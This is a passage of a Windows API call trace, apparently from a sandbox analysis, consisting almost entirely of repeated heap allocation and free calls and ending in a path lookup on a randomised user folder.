(HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0194.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.251] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.251] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.253] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.253] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.253] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.253] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.261] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\") returned="SVKL6Wu5uab uSVqvA\\" [0194.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0194.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a08 [0194.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) 